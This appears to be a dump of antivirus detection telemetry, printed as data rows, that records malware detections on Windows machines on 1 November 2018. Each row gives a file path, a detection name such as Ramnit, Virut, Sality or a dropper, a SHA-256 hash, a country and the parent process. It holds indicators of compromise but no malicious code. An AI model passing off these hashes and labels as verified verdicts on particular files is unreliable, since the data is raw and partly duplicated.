  Row(detection=Row(filename='avscan-20181101-200623-0ddd0f85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_11b28272\\AVSCAN-20181101-195424-B6338887\\AVSCAN-20181101-200623-0DDD0F85', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-214659-381e66d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93bac124\\AVSCAN-20181031-214509-2A1935B3\\AVSCAN-20181031-214659-381E66D8', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:47:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(1).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(1).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091054-b1de0bf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32700320\\AVSCAN-20181101-085751-44C2A5D6\\AVSCAN-20181101-091054-B1DE0BF6', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(3).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(3).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(2).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174742-0ed225b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_97e40d2c\\AVSCAN-20181101-174724-0B25BEEB\\AVSCAN-20181101-174742-0ED225B3', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline=None, country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e778f2c4-e042-8e12-92c0-f929ce491542.exe', filepath='G:\\{62b7b3df-a488-dda0-1185-787f7297498d}\\e778f2c4-e042-8e12-92c0-f929ce491542.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new9ant091i.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LEU43SUA\\new9ANT091I.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='88a03271b84e4c8ba1f02e90e45ee298736ce610765a9c68fa9235c35624984a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013836-461d41f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013644-3001918A\\AVSCAN-20181102-013836-461D41F8', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='88a03271b84e4c8ba1f02e90e45ee298736ce610765a9c68fa9235c35624984a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3d frog frenzy.exe', filepath='\\?\\J:\\العاب2\\الضفدعة\\3D Frog Frenzy.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='88cd48a37cbad75afcc1b95f9645564d6d8a7f62c23d2cbf35d29816079253c3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8900b9feeabb336e69aa7ea8ecc1b1e43d7bf8411e06ef2b63acac86433a8c5f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\8900B9FEEABB336E69AA7EA8ECC1B1E43D7BF8411E06EF2B63ACAC86433A8C5F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8900b9feeabb336e69aa7ea8ecc1b1e43d7bf8411e06ef2b63acac86433a8c5f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\uTorrent\\updates\\3.4.9_43085\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='89110efd86895b1f71c8e2e9fd9f8b7480cd894f33584a6c37a6409a3c47db6b', metadata=Row(cmdline='\\\\\\/apps \\\\\\/fast \\\\\\/ext \\\\\\"exe,sys\\\\\\" \\\\\\/output \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_SAMSUNGNP300E5A.xml\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T06:07:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='K:\\HBCD\\Programs\\DELETEJOBPRINTER.EXE', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190452-ee5e7a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190452-EE5E7A89', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aztec .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\aztec\\aztec .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='893f3c93823abf3f2252f05930ed77a3116f3a6b28e4cc66df2c176d1b2eff4f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hddvdengine.dll', filepath='C:\\Program Files\\Common Files\\Ahead\\Lib\\HDDVDEngine.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='8943f7878c9ca225b2243ff95e24691fbf88ff57a1138bb522c3a144e47d21e0', metadata=Row(cmdline='--engine=2 --session-id=JT8xt\\\\\\/\\\\\\/xpTJIIbi0cGjs\\\\\\/bYvVFeRc8CMQNQS7rQz --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.168.200\\software_reporter_tool.exe', parentsize=12408440, timestamp='2018-11-01T12:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\89B60FB73D586146AF97F822463EC751E00EB4D4641F37D6A454AFD39A2E80BD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:09:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ad4a4686235b6e2c0f0e9f4714786a98c86c74519ab76131fb7ff85f8978cde', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\8AD4A4686235B6E2C0F0E9F4714786A98C86C74519AB76131FB7FF85F8978CDE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8ad4a4686235b6e2c0f0e9f4714786a98c86c74519ab76131fb7ff85f8978cde', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172620-d626363f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172620-D626363F', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='8ae0549ba3ebca1312a0e25fff7693cfe887a2cf59ba78cacd42a4074b7c1b9d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vichrova_anastasija.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Vichrova_Anastasija.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='8ae0549ba3ebca1312a0e25fff7693cfe887a2cf59ba78cacd42a4074b7c1b9d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8b53130fafc01d4121f32500954769202fedba43f7855bac411f7780dd169182', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-32\\8B53130FAFC01D4121F32500954769202FEDBA43F7855BAC411F7780DD169182', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='8b53130fafc01d4121f32500954769202fedba43f7855bac411f7780dd169182', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:50:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wrfup9xw7.exe', filepath='C:\\PROGRA~1\\WRFUP9XW7W\\WRFUP9XW7.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T20:25:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trz6375.tmp', filepath='\\\\?\\C:\\Program Files\\PBWH10V91C\\trz6375.tmp', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:30:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.21720_none_75dc5a4092e0dcc7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b90e3e508cce54c4e83097a770130c2ca1eed46c0ba74ee84880654a00f48c5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.21720_none_75dc5a4092e0dcc7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b90e3e508cce54c4e83097a770130c2ca1eed46c0ba74ee84880654a00f48c5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:36:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:15:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='resmgr.exe', filepath='C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MTWUrrMeKU+EfPMU.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T00:42:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='8bc02e467dd9d260328f23b822e47ad7cfcb39d072d1a477540732be0b689f2b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cmcontainer_details.htm', filepath='C:\\Users\\Sri Chakra\\AppData\\Local\\Temp\\CodeMeter_v6.40.2405.502\\Redist\\CodeMeter\\Runtime\\help\\6.40b\\CmUserHelp\\us\\cmcontainer_details.htm', filesize=392000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='8c0211bdaf62dfb241d25321e9d5436c3860895c070118cc72dd50c3120c51ff', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8c2cd58b2daa2929a126ba29a4fb8a58bd2553becae877b98994dc80c082bde1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8C2CD58B2DAA2929A126BA29A4FB8A58BD2553BECAE877B98994DC80C082BDE1', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='8c2cd58b2daa2929a126ba29a4fb8a58bd2553becae877b98994dc80c082bde1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183041-16acb590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_306862dd\\AVSCAN-20181101-183012-1293AFAF\\AVSCAN-20181101-183041-16ACB590', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='green bubbles.exe', filepath='F:\\Green Bubbles.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:22:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultima lucrare.exe', filepath='F:\\Ultima lucrare\\Ultima lucrare.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:25:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182753-ff498e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_306862dd\\AVSCAN-20181101-182701-F801935C\\AVSCAN-20181101-182753-FF498E54', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8d3611350c442bd7fbc16b65540d023c29cb8a73af5b52d8134afc631fad95b6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\8D3611350C442BD7FBC16B65540D023C29CB8A73AF5B52D8134AFC631FAD95B6', filesize=512000, name='TR/Dropper.Gen2.#M300.#R100277'), hash='8d3611350c442bd7fbc16b65540d023c29cb8a73af5b52d8134afc631fad95b6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:37:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='\\\\?\\F:\\โปรเเกรมคอม 1\\โปรเเกรมทางด้านเอกสาร\\Microsoft Office 2003-2007-2010-2013 AIO + Crack\\autorun.exe', filesize=7232000, name='W32/Neshta.A.#M1.#R1'), hash='8d501d078233b52c9dd59bdb2d20ff2799bf3463e06619c419b7f58d961262c6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\โปรเเกรมคอม 1\\โปรเเกรมทางด้านเอกสาร\\Microsoft Office 2003-2007-2010-2013 AIO + Crack\\autorun.exe', filesize=7232000, name='W32/Neshta.A.#M1.#R1'), hash='8d501d078233b52c9dd59bdb2d20ff2799bf3463e06619c419b7f58d961262c6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675384, timestamp='2018-11-01T06:00:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T01:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\USB__Data\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='speedownloader.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\speedownloader.exe', filesize=420000, name='HEUR/AGEN.1033019.#M1.#R1'), hash='8dfceb6bfd1723f11c3a60f359f5830d94da2008bdee6f83856d19f2a92bcf82', metadata=Row(cmdline='-boot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\PremierOpinion\\pmropn.exe', parentsize=3705792, timestamp='2018-11-01T03:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='(pc)lborder.html', filepath='d:\\lan games\\warcraft iii\\support\\layout\\(PC)LBorder.html', filesize=19508000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='8e3993d60d2775905a7d3d3358c2d9af4a953429b28a2578fc5c967403134421', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windowsanytimeupgraderesults.exe', filepath='\\\\?\\C:\\Windows\\System32\\WindowsAnytimeUpgradeResults.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='8e443819563221fb34c218381353d70d3cf6d070b7389e6bc9ed2e7e4427edb3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:57Z'), dt=datetime.date(2018, 11, 1)),
